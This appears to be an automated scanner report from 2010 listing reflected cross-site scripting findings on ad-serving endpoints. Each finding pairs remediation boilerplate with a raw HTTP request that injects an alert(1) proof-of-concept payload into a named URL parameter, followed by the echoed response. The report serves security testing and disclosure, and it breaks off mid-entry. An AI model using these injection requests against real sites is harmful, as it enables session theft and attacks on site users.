Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d77bf'-alert(1)-'ceefda2404d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.ny_postd77bf'-alert(1)-'ceefda2404d/tier2_082410 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 425 Date: Fri, 26 Nov 2010 20:42:17 GMT Connection: close Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5517'-alert(1)-'a705b220f40 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.ny_post/tier2_082410b5517'-alert(1)-'a705b220f40 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 425 Date: Fri, 26 Nov 2010 20:42:17 GMT Connection: close Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT
1.3. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.ny_post/tier2_082410
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a584c'-alert(1)-'2281f760d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.ny_post/tier2_082410?a584c'-alert(1)-'2281f760d0a=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 428 Date: Fri, 26 Nov 2010 20:42:17 GMT Connection: close Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b7ce'-alert(1)-'ff9a7dd6ec was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 450 Date: Fri, 26 Nov 2010 20:46:51 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:46:51 GMT
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 324a9"-alert(1)-"51cac44738e was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141324a9"-alert(1)-"51cac44738e&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6993 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:26 GMT Expires: Fri, 26 Nov 2010 20:48:26 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 41%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141324a9"-alert(1)-"51cac44738e&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/cre/scoreboard-display.aspx?&code=9903600269"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "o ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15e7d"-alert(1)-"f07b9d6f0c7 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=172482315e7d"-alert(1)-"f07b9d6f0c7&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6993 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:31 GMT Expires: Fri, 26 Nov 2010 20:48:31 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 6079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=172482315e7d"-alert(1)-"f07b9d6f0c7&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/cre/scoreboard-display.aspx?&code=9903600269"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75b16"-alert(1)-"6269292a7b5 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=9795775b16"-alert(1)-"6269292a7b5&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7023 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:20 GMT Expires: Fri, 26 Nov 2010 20:48:20 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... /3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=9795775b16"-alert(1)-"6269292a7b5&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/savings-plus/price-and-service.aspx?&code=9903600204"); var fscUrl = url; var fscUrlClic ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db7a3"-alert(1)-"83ac384fb94 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687db7a3"-alert(1)-"83ac384fb94&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6993 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:22 GMT Expires: Fri, 26 Nov 2010 20:48:22 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687db7a3"-alert(1)-"83ac384fb94&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/cre/scoreboard-display.aspx?&code=9903600269"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30be3"-alert(1)-"9f1762bff76 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=1559930be3"-alert(1)-"9f1762bff76&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6993 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:18 GMT Expires: Fri, 26 Nov 2010 20:48:18 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... k%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=1559930be3"-alert(1)-"9f1762bff76&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/cre/scoreboard-display.aspx?&code=9903600269"); var fscUrl = url; var fscUrlCl ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0460"-alert(1)-"3194ac5b21c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957c0460"-alert(1)-"3194ac5b21c&_pn=1781348&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6996 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:35 GMT Expires: Fri, 26 Nov 2010 20:48:35 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957c0460"-alert(1)-"3194ac5b21c&_pn=1781348&redirect=http://www.progressive.com/insurance/loyalty/immediate-rewards.aspx?&code=9903600308"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "";
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cf61"-alert(1)-"0ee0ae8ace8 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=17813489cf61"-alert(1)-"0ee0ae8ace8&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6085 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:37 GMT Expires: Fri, 26 Nov 2010 20:48:37 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2,594 Template Name = Banner Creative (Flas ...[SNIP]... 3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=17813489cf61"-alert(1)-"0ee0ae8ace8&redirect=http://www.progressive.com/insurance/savings-plus/price-and-service.aspx?&code=9903600312"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e76e9"-alert(1)-"4c92364cc13 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0e76e9"-alert(1)-"4c92364cc13&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6996 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:29 GMT Expires: Fri, 26 Nov 2010 20:48:29 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0e76e9"-alert(1)-"4c92364cc13&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/loyalty/immediate-rewards.aspx?&code=9903600308"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opa ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24b4b"-alert(1)-"3c253612db8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
